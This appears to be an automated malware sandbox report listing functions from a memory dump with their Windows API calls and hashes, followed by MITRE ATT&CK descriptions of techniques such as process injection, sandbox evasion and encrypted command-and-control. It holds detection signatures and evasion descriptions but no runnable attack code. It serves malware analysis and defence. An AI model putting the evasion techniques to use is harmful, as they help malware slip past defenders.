Uniqueness Score: -1.00%

Function 032D4657, Relevance: 1.5, APIs: 1, Instructions: 44libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,032D551C,032D233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 032D4750

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5e52bb123937d66def39c0c7d2491279a977318c5de719791f181b9b4b1f5682
Instruction ID: 5b3ee674220a86362de2cd6a9d6997796a2163b117c800d774d0f5972e58e029
Opcode Fuzzy Hash: 5e52bb123937d66def39c0c7d2491279a977318c5de719791f181b9b4b1f5682
Instruction Fuzzy Hash: ABF0A72827D315EEB628FE635F14BF911A61F03BD0F444217AC578A0809FF484C485D7

Uniqueness

Uniqueness Score: -1.00%

Function 032D6177, Relevance: 1.5, APIs: 1, Instructions: 42threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 032D61D2

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: e856252a4e3d2c1fb56db85935d8c4ef4f50944fb222c4b7a358b97c3694e6d0
Instruction ID: 11bd42b782f122199d5de8928101bc05f54b14ec636e1ebac0b38c4858d769fc
Opcode Fuzzy Hash: e856252a4e3d2c1fb56db85935d8c4ef4f50944fb222c4b7a358b97c3694e6d0
Instruction Fuzzy Hash: 81F0E95473D2038DFF19DA28898C3BC7716AF46310BDC85B4DC47A2519D2ACC9C44201

Uniqueness

Uniqueness Score: -1.00%

Function 032D4729, Relevance: 1.5, APIs: 1, Instructions: 39libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,032D551C,032D233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 032D4750

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 38e771ae4b56a03acdd1e46bac67ea5c047603b61e66d26242d1df8421d568a1
Instruction ID: 6008f91dee3883ff5a548539f0ba0c69d4b020c62c84ffebe623ce0f48b04bf3
Opcode Fuzzy Hash: 38e771ae4b56a03acdd1e46bac67ea5c047603b61e66d26242d1df8421d568a1
Instruction Fuzzy Hash: 8BF0822827E351EAB606F6274D587F95B910E07650B588166DC4787152DFF488C086C2

Uniqueness

Uniqueness Score: -1.00%

Function 032D61C5, Relevance: 1.5, APIs: 1, Instructions: 39threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 032D61D2

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 52182dcdb8e6e448b16d5f54ddfb78f4354a6c748507cd613c3e6a918aadc711
Instruction ID: 8322d22473e072b531c58019b05e60b282e27270ddef19e8bb80705d7b9d6717
Opcode Fuzzy Hash: 52182dcdb8e6e448b16d5f54ddfb78f4354a6c748507cd613c3e6a918aadc711
Instruction Fuzzy Hash: 72F0A72463D203D9FF2ADE188A4C3787315AF16710FD8456DC89766209D2FCC9C49211

Uniqueness

Uniqueness Score: -1.00%

Function 032D4698, Relevance: 1.5, APIs: 1, Instructions: 38libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,032D551C,032D233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 032D4750

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 85383f61b329065b502465868fbf4f9437360bcb4c13e2f3302b7116657418d5
Instruction ID: e7476158b8e880d9c3a9bf8361117e0144a25d6653f6c04ea174c64a25a3be3c
Opcode Fuzzy Hash: 85383f61b329065b502465868fbf4f9437360bcb4c13e2f3302b7116657418d5
Instruction Fuzzy Hash: 42F0EC1827D315DAB609FA735E18BFD56A21E03B90F488116DC4747040DFF484C485C5

Uniqueness

Uniqueness Score: -1.00%

Function 032D6198, Relevance: 1.5, APIs: 1, Instructions: 37threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 032D61D2

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 4acac2b48cb4350aed9631e7952effac3d59911e5e22439e17bade84d94fe5af
Instruction ID: 36a11bbb341e2078e08691b4526cd8aa5ac28e7327944be610214d391e1691d1
Opcode Fuzzy Hash: 4acac2b48cb4350aed9631e7952effac3d59911e5e22439e17bade84d94fe5af
Instruction Fuzzy Hash: 8CF0EC1463D1439DFF1ADE24C95C3BD7B26AF46210FDC85B4DC476250AD2ACC9C44640

Uniqueness

Uniqueness Score: -1.00%

Function 032D46CD, Relevance: 1.5, APIs: 1, Instructions: 32libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,032D551C,032D233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 032D4750

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: b38b57689c261c49aa7eddd39f9ced5e94c18af1f18c08286860e9db13eb22f5
Instruction ID: 96363e3c8364e0b54a06d2c5c45a342aaf8f765cee1933ccd1f84b9bca830e78
Opcode Fuzzy Hash: b38b57689c261c49aa7eddd39f9ced5e94c18af1f18c08286860e9db13eb22f5
Instruction Fuzzy Hash: 24E0DF282BD311EAB609FA671E68BFE56961F47B90F588126EC0787140DFF4C8C08A81

Uniqueness

Uniqueness Score: -1.00%

Function 032D4B79, Relevance: 1.5, APIs: 1, Instructions: 31libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 032D4BB0

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 90f302fea79836f19ea20b5609bf4d90a16b3fb3ba32db99beb1aa3eee378744
Instruction ID: a8c3ff2388bd180984911f98ca724e1d5794774deba542b5fd863498ef0dd374
Opcode Fuzzy Hash: 90f302fea79836f19ea20b5609bf4d90a16b3fb3ba32db99beb1aa3eee378744
Instruction Fuzzy Hash: DEF0E520D39089EFDF01BE2188587FE2F3A9E61211BCC4581E85357062CBB589D48A12

Uniqueness

Uniqueness Score: -1.00%

Function 032D4B4C, Relevance: 1.5, APIs: 1, Instructions: 31libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 032D4BB0

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 7d39d770564495f01563cf6c80b9939f589265bae7ac3b8f6b066f8d9e290421
Instruction ID: dd7e0244a153c19684dc45f10d3502c6c202437f2d47398db1421be17bcf7fe4
Opcode Fuzzy Hash: 7d39d770564495f01563cf6c80b9939f589265bae7ac3b8f6b066f8d9e290421
Instruction Fuzzy Hash: 5FF0E520A79089EFEF016F2088687FE2F3A5E922217CC49C1E84757063CB798DD4CA11

Uniqueness

Uniqueness Score: -1.00%

Function 032D46C2, Relevance: 1.5, APIs: 1, Instructions: 31libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,032D551C,032D233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 032D4750

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 160dc12557010884129baab39c484e735a2ab5126e9449a62ec6d1b7b97fea3c
Instruction ID: 46c002a551063e7241814a9333e68aa2bf88566fcf3099d18ddaf7e24be352a1
Opcode Fuzzy Hash: 160dc12557010884129baab39c484e735a2ab5126e9449a62ec6d1b7b97fea3c
Instruction Fuzzy Hash: C3E0862827D310DBB115FA671B187F953955E07B90F508117EC17471409FF484C485C2

Uniqueness

Uniqueness Score: -1.00%

Function 032D61F1, Relevance: 1.5, APIs: 1, Instructions: 31threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 032D61D2

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 3a2ab7d03f7bd2ac662efaf4593fd6b8f96b1d97345371528c5f67e7bc64f201
Instruction ID: a24d915d555f3c0e5553db253c7559f6d3ae85607e482e381bf7e08a61749a4c
Opcode Fuzzy Hash: 3a2ab7d03f7bd2ac662efaf4593fd6b8f96b1d97345371528c5f67e7bc64f201
Instruction Fuzzy Hash: C7E0D82453D242DDEF16CE688A483783625AF57210FE485B9D8536610ED1EDC9C44251

Uniqueness

Uniqueness Score: -1.00%

Function 032D6205, Relevance: 1.5, APIs: 1, Instructions: 29threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 032D61D2

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 7b8ee06575638fcfa1473302b5ab7f233de6881092d4c5828a02e30b861f2be4
Instruction ID: 46ce1439f1da31d3e521df7113546546e2ad1d4b47cc7301a0494b668f41abc4
Opcode Fuzzy Hash: 7b8ee06575638fcfa1473302b5ab7f233de6881092d4c5828a02e30b861f2be4
Instruction Fuzzy Hash: 58E0DF2453C20289EF2ACA648A483787225AF46310FE48578C8536220DD1E8CAC40251

Uniqueness

Uniqueness Score: -1.00%

Function 032D46F4, Relevance: 1.5, APIs: 1, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,032D551C,032D233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 032D4750

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 6f0cb69c7afe7f66cf596a059cab0aa91e4a993c90e738b8c53aa4f316e6ecb6
Instruction ID: 646c6e855dd597eed0c557e9742f4e9a00cc3ed1a3146136db4c90606dc30ca1
Opcode Fuzzy Hash: 6f0cb69c7afe7f66cf596a059cab0aa91e4a993c90e738b8c53aa4f316e6ecb6
Instruction Fuzzy Hash: 3EE0DF182BD250DAF602B62A1A187FD9BA11E4B760B988065DC4A87001DFF888C08A80

Uniqueness

Uniqueness Score: -1.00%

Function 032D4735, Relevance: 1.5, APIs: 1, Instructions: 27libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,032D551C,032D233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 032D4750

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 8d13d7aef5d52a7f3eb853c065fd13661548039ea66b82bcdb211d06f7581a51
Instruction ID: 4715e5d3ef43627fc7fc7562e9c967652774b49c723d13bb1226472776b61472
Opcode Fuzzy Hash: 8d13d7aef5d52a7f3eb853c065fd13661548039ea66b82bcdb211d06f7581a51
Instruction Fuzzy Hash: C1E0CD183BD310D6F505F66B1E487FD5B511D4B761F548175DC4787040DFF888C04A91

Uniqueness

Uniqueness Score: -1.00%

Function 032D61BD, Relevance: 1.5, APIs: 1, Instructions: 26threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32 ref: 032D61D2

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: fa0e3663e8ae16f2e789d0838426d2e83579c4751522e05811b83d0b28ce363f
Instruction ID: 802b4bf7a8ed2fcf3e4b6f9a1807290b54656d1acbd359a4c1d9b484b8680f7d
Opcode Fuzzy Hash: fa0e3663e8ae16f2e789d0838426d2e83579c4751522e05811b83d0b28ce363f
Instruction Fuzzy Hash: 7DE0C22463D202CDFF29DD64CB8C3B8322AAF46310FE48568CC576660DC2FCDAC44650

Uniqueness

Uniqueness Score: -1.00%

Function 032D470D, Relevance: 1.5, APIs: 1, Instructions: 25libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,032D551C,032D233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 032D4750

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c0fe2a7ed4151879c7dcd8c6a08828e3720f2e7c52879829471ada4a3b45f299
Instruction ID: 3b32d6cf73e9a1dad8fbf26284dcb53e8a79714358c705ebe54405957eabebf7
Opcode Fuzzy Hash: c0fe2a7ed4151879c7dcd8c6a08828e3720f2e7c52879829471ada4a3b45f299
Instruction Fuzzy Hash: 9FE08C282BC210DAB605BA6A1E587FD5B920E47B50B988165AC0687140CFF888808A81

Uniqueness

Uniqueness Score: -1.00%

Function 032D4B47, Relevance: 1.5, APIs: 1, Instructions: 22libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 032D4BB0

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: f775026226d8fef70c25903cfef2927489db113e730c1229a58030b2d1ef0a96
Instruction ID: e1fc2bfa1e6df345c5e4b66a9194026070a239eea2d09812092a8a14e247204c
Opcode Fuzzy Hash: f775026226d8fef70c25903cfef2927489db113e730c1229a58030b2d1ef0a96
Instruction Fuzzy Hash: FDE0EC24D38149EF8F24FE1248657FA2B2A9E71210BC40502E857570908FB64AE89A52

Uniqueness

Uniqueness Score: -1.00%

Function 032D4755, Relevance: 1.5, APIs: 1, Instructions: 22libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,032D551C,032D233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 032D4750

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1a9c7c822fc66cdd70c5c409b60a422107396c3e8e2f2965a4cded9c5df6a5a2
Instruction ID: 9fdab1069b4057a8d3a647a3696c03591d20b67143b50e959d3d336a6ffd3d4c
Opcode Fuzzy Hash: 1a9c7c822fc66cdd70c5c409b60a422107396c3e8e2f2965a4cded9c5df6a5a2
Instruction Fuzzy Hash: 68D05E682BC321D6B605FA6B1E587FD52910F07B90F548126AC1686140CFF888C08692

Uniqueness

Uniqueness Score: -1.00%

Function 032D4B7B, Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 032D4BB0

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 0188267f9ac136d60d18a3d7629bbef8599c12d6a098fa300f0756d189d34e04
Instruction ID: 434f687039218afe281fd28905c4a64cd8863138f78837d82aafb8ca3b2db570
Opcode Fuzzy Hash: 0188267f9ac136d60d18a3d7629bbef8599c12d6a098fa300f0756d189d34e04
Instruction Fuzzy Hash: D4D01220938109DF8F11AE2588597E92F655F21210B840142F85257095CBB68AE49A12

Uniqueness

Uniqueness Score: -1.00%

Function 032D4B87, Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 032D4BB0

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: ab05d0080b2e996288ec17c0607a3245de58d815a87cb9495d84f8b5eb417551
Instruction ID: 3ffe7a12eb745e38cfeeb129b92a2a56136a4909e9d730671b270fbcb4314a55
Opcode Fuzzy Hash: ab05d0080b2e996288ec17c0607a3245de58d815a87cb9495d84f8b5eb417551
Instruction Fuzzy Hash: 87D01220929109DFDF156F618C58AEE2F369F60311B884592F817560A1CB7189E08B11

Uniqueness

Uniqueness Score: -1.00%

Function 032D4761, Relevance: 1.5, APIs: 1, Instructions: 18libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,032D551C,032D233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 032D4750

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 65f1867b9e6c5a32f20df41fec620c93eabf42960adf6a62c5ab36f9dd6726e3
Instruction ID: a0678e46837f29d669e08f3a2bd836af84698b8c9b183b02914e50c9b25cdd72
Opcode Fuzzy Hash: 65f1867b9e6c5a32f20df41fec620c93eabf42960adf6a62c5ab36f9dd6726e3
Instruction Fuzzy Hash: B3D012282BC321D2B505F65B1F497F952950F07791F8081169C57830409FF48CC08192

Uniqueness

Uniqueness Score: -1.00%

Function 032D4B9C, Relevance: 1.5, APIs: 1, Instructions: 18libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?), ref: 032D4BB0

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 609ed18ee1f3374ea1ad6cae72f25a88798690fdf00997cea851a12e711fb50c
Instruction ID: 64c3f6665d5d421c834987dcaa43f67ced62553d16e0e7b991bdb52365704d2c
Opcode Fuzzy Hash: 609ed18ee1f3374ea1ad6cae72f25a88798690fdf00997cea851a12e711fb50c
Instruction Fuzzy Hash: F4D05E3192500AAFDF156F208C5CAEE3F36AF60321BC84591F816960A1CB318DE08E01

Uniqueness

Uniqueness Score: -1.00%

Function 032D3E5F, Relevance: 1.5, APIs: 1, Instructions: 16fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,032D3DFC,?,B8C2EBD8), ref: 032D3E94

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e3ec208524f6a987ebbce20dcad9d5f16c5f2a112af128d3963778fab2d2f563
Instruction ID: cdd6865e02339ab39e6477c6feb708aa939ba2be8b90ca44ddc36b20714d9776
Opcode Fuzzy Hash: e3ec208524f6a987ebbce20dcad9d5f16c5f2a112af128d3963778fab2d2f563
Instruction Fuzzy Hash: F6D012707E0344B9F97446208D66FD95A155B90B02F2898557B867E5C2C2E55590C928

Uniqueness

Uniqueness Score: -1.00%

Function 032D474E, Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,032D551C,032D233A,00000000,00000000,00000000,00000000,?,00000000,00000000,?), ref: 032D4750

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: c239b33ca21e9d4e799237b65cd5a301a73cd99fa3d409ca4813a40eff59a05f
Instruction ID: 5e8fe68ba4eefbca14954da2506fad5784ebd38f549849f92c6d4cdd67aab5ae
Opcode Fuzzy Hash: c239b33ca21e9d4e799237b65cd5a301a73cd99fa3d409ca4813a40eff59a05f
Instruction Fuzzy Hash: D9C08C282BC224C37206B69F2A083EA43810F4B610B804111AC46820009FF088804285

Uniqueness

Uniqueness Score: -1.00%

Function 032D3E58, Relevance: 1.5, APIs: 1, Instructions: 14fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,032D3DFC,?,B8C2EBD8), ref: 032D3E94

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 45e174c85df51b90ba54fb4a855a5d121e681982c060c1dd91aadd9466201dd1
Instruction ID: 70ae7eefcf0b845c7481a1f3d493ce8b7f2bff73000380572fff952115106c1c
Opcode Fuzzy Hash: 45e174c85df51b90ba54fb4a855a5d121e681982c060c1dd91aadd9466201dd1
Instruction Fuzzy Hash: DAD012307F4300B6FA74CA209E16F9922105FD0F40F2448087B86390C082E16AA0C42A

Uniqueness

Uniqueness Score: -1.00%

Function 032D3E7C, Relevance: 1.5, APIs: 1, Instructions: 11fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,032D3DFC,?,B8C2EBD8), ref: 032D3E94

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 7c3d52e98be79e0a13df16fe7be4c597c42ba2b7d856cb3ea262e512873de153
Instruction ID: 413f864b063983d8297a2f9588eec4a73085243724893a55983405b6799543b5
Opcode Fuzzy Hash: 7c3d52e98be79e0a13df16fe7be4c597c42ba2b7d856cb3ea262e512873de153
Instruction Fuzzy Hash: 07C08CA0691140A9FE2006304C58FC95B114B81301F1C8890B94567042C7258450C818

Uniqueness

Uniqueness Score: -1.00%

Function 032D36F0, Relevance: 1.5, APIs: 1, Instructions: 10libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(FE8166D8), ref: 032D370D

Memory Dump Source

Source File: 00000019.00000002.689367509.00000000032D1000.00000040.00000001.sdmp, Offset: 032D1000, based on PE: false

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: f8f5c851736b6d0dbe868e21203c961050378d2f8e7c25c6b76686577ce046be
Instruction ID: 6134ad567e4899dd39e2f9b55e91926342779e4ef630e3435e7ce0478482c908
Opcode Fuzzy Hash: f8f5c851736b6d0dbe868e21203c961050378d2f8e7c25c6b76686577ce046be
Instruction Fuzzy Hash: CDC02B7038600C0DD5007373040C59D06050BD2340BFFC001D0808F70ACE088C98B7D0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
